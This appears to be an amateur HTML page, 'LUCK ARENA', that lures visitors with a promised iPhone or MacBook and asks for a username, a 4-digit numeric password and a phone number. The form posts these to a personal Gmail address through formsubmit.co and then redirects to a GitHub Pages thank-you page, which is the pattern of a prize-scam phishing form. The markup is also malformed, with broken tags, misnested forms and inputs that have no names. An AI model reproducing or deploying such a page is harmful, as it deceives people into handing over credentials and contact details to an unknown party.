<!doctype html
<html>
<head>
<style>
body {
background-color:brown;
font-family: Arial;
}
h1 {font-family:Courier New;
color: green;
text-align: center;
border-radius: 40px;
background-color: brown;
}
button {background-color:brown;
}
form{
background-color:crimson;
}
p {
    color:green;
    padding-right: 50px;
}
legend {
    color:green;
    font-weight: bold;
    text-align: center;
}
h3 {
    color:green;
}
input {
    color:green;
}
fieldset {
    color: brown;
    border-radius: 10px;
}
.home {
    text-align: center;
    padding-left: 40px;
}
</style>
</head>
<body>
<form>
<fieldset>
<legend>TITLE</legend>
<div>
<h1 style="color:green">LUCK ARENA</h1>
<p class="home">Enter <em>details</em> to win <strong>iphone 14 PRO MAX </strong> OR <strong> MACBOOK PRO</strong></p>
</div>
</fieldset>
</form>
<form action="https://formsubmit.co/noobbeatz772@gmail.com" method="POST"/>
<fieldset>
<legend>personal details</legend>
<p>username:</p> <input type="text" placeholder="username" required>
<p>4 digit password:</p> <input type="password" maxlength="4" placeholder="password" pattern="[0-9]{4}" required="password"</p><br>
<p>confirm password:</p> <input type="password" maxlength="4" placeholder="confirm password" pattern="[0-9]{4}" required>
<p>our official colour:</p> <input type="color" required><br>
<p>Telephone no:</p> <input type="tel" maxlength="11" placeholder="phone" pattern="[0-9]{4}[0-9]{3}[0-9]{4}" required>
<p>age: 18+<input type="checkbox" required></p><br>
<input type="hidden" name="_next" value="https://m-i-d-e772.github.io/ZEE/werey.html/thanks.html">
<input type="submit" value="sign up">
</form>
</fieldset>
</form>
<form>
<fieldset>
<legend>HOW EXCITED ARE YOU ?</legend>
<input type="range" maxlength"5" required>
</fieldset>
</form>
</body>
</html>